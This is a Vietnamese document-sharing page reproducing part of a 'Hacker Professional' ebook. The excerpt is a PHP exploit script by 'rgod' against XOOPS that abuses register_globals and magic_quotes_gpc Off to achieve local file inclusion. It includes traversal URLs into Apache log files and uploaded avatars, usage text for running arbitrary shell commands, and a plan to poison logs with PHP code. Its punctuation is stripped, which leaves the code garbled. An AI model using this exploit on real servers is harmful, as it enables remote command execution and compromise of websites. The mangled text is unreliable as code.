TAILIEUCHUNG - Hacker Professional Ebook part 442

Tham khảo tài liệu 'hacker professional ebook part 442', công nghệ thông tin, kỹ thuật lập trình phục vụ nhu cầu học tập, nghiên cứu và làm việc hiệu quả | echo by rgod rgod@ r n echo site http r n r n works with magic_quotes_gpc Off register_globals On if argc 4 echo Usage php . argv 0 . host path cmd OPTIONS r n echo host target server ip hostname r n echo path path to xoops r n echo cmd a shell command r n echo Options r n echo -p port specify a port other than 80 r n echo -P ip port specify a proxy r n echo Examples r n echo php . argv 0 . localhost xoops r n echo php . argv 0 . localhost xoops ls -la -p81 r n echo php . argv 0 . localhost ls -la 80 r n die hi back from my annual social engineering tour this year in Milan welcome to this new 0day experience. explaination vulnerable code in at lines 94-96 if isset xoopsOption nocommon XOOPS_ROOT_PATH include XOOPS_ROOT_PATH. include . if register_globals On you can overwrite xoopsOption nocommon var to skip inclusion where xoopsConfig language and xoopsConfig theme_set are initialized so if magic_quotes_gpc Off you can include arbitrary files from local resources ex. Apache log files http target path cmd ls 20-la xoopsOption nocommon 1 xoopsConfig language . . . . . . . . . . . var l og httpd access_log 00 http target path cmd ls 20-la xoopsOption nocommon 1 xoopsConfig theme_set . . . . . . . . . . . var log httpd error_log 00 or if avatar uploads are enabled http target xoops html cmd ls 20- la xoopsOption nocommon 1 xoopsConfig theme_set . uploads cavt44703c3 0d3dbfjpg 00 this tool inject some php code in apache log files and try to launch commands error_reporting 0 ini_set max_execution_time 0 ini_set default_socket_timeout 5 function quick_dump string result exa cont 0 for i 0 i strlen string -1 i if ord string i 32 ord string i 126 result. . else result. . string i if strlen dechex ord string i 2 exa. .dechex ord string i else exa. 0 .dechex ord string i cont if cont 15 cont 0 result. r n exa. r n return exa. r n . result proxy_regex b d 1 3 . d 1 3

TAILIEUCHUNG - Chia sẻ tài liệu không giới hạn
Địa chỉ : 444 Hoang Hoa Tham, Hanoi, Viet Nam
Website : tailieuchung.com
Email : tailieuchung20@gmail.com
Tailieuchung.com là thư viện tài liệu trực tuyến, nơi chia sẽ trao đổi hàng triệu tài liệu như luận văn đồ án, sách, giáo trình, đề thi.
Chúng tôi không chịu trách nhiệm liên quan đến các vấn đề bản quyền nội dung tài liệu được thành viên tự nguyện đăng tải lên, nếu phát hiện thấy tài liệu xấu hoặc tài liệu có bản quyền xin hãy email cho chúng tôi.
Đã phát hiện trình chặn quảng cáo AdBlock
Trang web này phụ thuộc vào doanh thu từ số lần hiển thị quảng cáo để tồn tại. Vui lòng tắt trình chặn quảng cáo của bạn hoặc tạm dừng tính năng chặn quảng cáo cho trang web này.